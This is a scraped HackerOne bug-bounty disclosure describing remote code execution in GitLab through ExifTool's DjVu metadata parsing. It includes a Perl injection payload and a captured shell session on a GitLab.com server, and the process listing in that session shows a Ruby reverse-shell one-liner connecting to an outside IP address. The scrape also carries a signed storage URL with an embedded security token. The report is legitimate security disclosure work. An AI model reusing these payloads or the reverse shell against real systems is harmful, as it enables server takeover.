0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T19:30:09", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T19:30:09", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T19:30:09", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSJ466BXP%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T193009Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCIBYtAc1RB%2BeHOrq9sn0KimjtaOIQjyte5OB7MH9SDnyBAiEAtLafHllMDemDMOLXk0WK%2BI67rH9Z%2FC7NHWEOdGkYYlIq%2BgMIHBACGgwwMTM2MTkyNzQ4NDkiDIYswCi6QOi7qFi8iirXA9aYtFij4vitCHA71ZmC85kNsf92JChmawGUKU1U56%2Flf6rJmzAYvMGOKfbyFYP%2FFHcFrMrSgY6P3Md310PPrv2RzgIu2Pebn44UWAvWjyn1g3ioSR9XjMoIfhb4k1Xzs2WpYvCARCcmzqFjizeAOt650J4YO71vTLtJ4RY%2BOos6EN5CFnTYTOvmN8DqNmur%2Bv6yXoTMVKipnbnISFOHvZ3HN96wk1JQ4HDlC9Aw8IDkU46wBltxBO%2FcH%2FtIXYXhJZmLPiFHw992joSpMEbzqC3hIOhHAYTL3oOT3IkynQy0BRTtcRt9N7ZtXMTcI87F7OdrlsN8B9SaCJiofD4zvz4tvgEGMbNw%2BGSqaIAkLOHjqK83QNP%2FGNgXVXy5rEcSdJjnu%2F12OkWbwdfwNuLFHM35i0YOS1C%2BR9NPrgvCDs5L5J9vsIaL2AiB86YjlqtKSEQa%2BLMntYWFFaNTCYes5wFX06UyZvBoPvuCDmHtl2iqVHHSDtQ0KYTrby9%2FbIvMwbBrBmMFot1MZpsPyA0cS7A9XfUANhq40i4OZbVftxo07zJpmPSv6z4XxyUm79q3FnVerlFRsuB3q%2BMlmrZ0JVuPljIF6ZJxa93Qs8bp0EhybJfOM6PA1TDJq4CFBjqlAT3ovtBKtzt4WrvEa%2FuDom07nHB64vdgCPfzSYoiijQKESPmJnLIk3%2BHTWGlXIB95lhkOUKF9d0tk%2BvHVh8%2FYTf0EnAxljPdX6kYJwtaZqfqosDtGLSFywRsYb1B9YhY1M8usnuhUIh%2Bh1pmNHAO1FppPe0zfgwtSiNeZEEnRM%2Bfg9%2F9vG3LF8qWBBst4FmcVrASOgWAQp7cV5PBMszJWQ%2FuDIcxeA%3D%3D&X-Amz-Signature=6443205e2697fd88a1910abdb95289b9a1f3c48213bc61088baa65a7eededbdd"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T19:30:09", "differentElements": ["h1reporter"], "edition": 24}, {"bulletin": {"id": "H1:1154542", "hash": "3141625111679974649c11b95fa707a4", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 